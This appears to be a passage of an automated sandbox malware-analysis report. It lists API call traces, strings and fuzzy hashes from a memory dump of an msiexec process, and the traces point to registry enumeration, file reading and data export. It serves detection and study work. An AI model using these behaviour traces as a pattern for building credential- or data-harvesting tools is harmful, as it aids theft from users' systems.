                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                • String ID: advapi32.dll
                                                                                • API String ID: 2012295524-4050573280
                                                                                • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                APIs
                                                                                Strings
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                • <%s>, xrefs: 004100A6
                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3473751417-2880344631
                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2521778956-791839006
                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscpy
                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                • API String ID: 999028693-502967061
                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                • memset.MSVCRT ref: 00408E46
                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2350177629-0
                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                • API String ID: 2221118986-1606337402
                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                • memset.MSVCRT ref: 00409042
                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 265355444-0
                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004116FF
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 2618321458-3614832568
                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFilefreememset
                                                                                • String ID:
                                                                                • API String ID: 2507021081-0
                                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                • malloc.MSVCRT ref: 00417524
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                • free.MSVCRT ref: 00417544
                                                                                • free.MSVCRT ref: 00417562
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                • String ID:
                                                                                • API String ID: 4131324427-0
                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                • free.MSVCRT ref: 0041822B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PathTemp$free
                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                • API String ID: 924794160-1420421710
                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                • API String ID: 1775345501-2769808009
                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 313946961-1552265934
                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                • API String ID: 0-1953309616
                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                APIs
                                                                                Strings
                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                • API String ID: 3510742995-272990098
                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                • memset.MSVCRT ref: 0040C439
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                • String ID:
                                                                                • API String ID: 1265369119-0
                                                                                • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044A6EB
                                                                                • memset.MSVCRT ref: 0044A6FB
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: gj
                                                                                • API String ID: 1297977491-4203073231
                                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                • free.MSVCRT ref: 0040E9D3
                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$free
                                                                                • String ID:
                                                                                • API String ID: 2241099983-0
                                                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                APIs
                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                • free.MSVCRT ref: 004174E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                • String ID:
                                                                                • API String ID: 4053608372-0
                                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                • memset.MSVCRT ref: 004450CD
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                • String ID:
                                                                                • API String ID: 1471605966-0
                                                                                • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
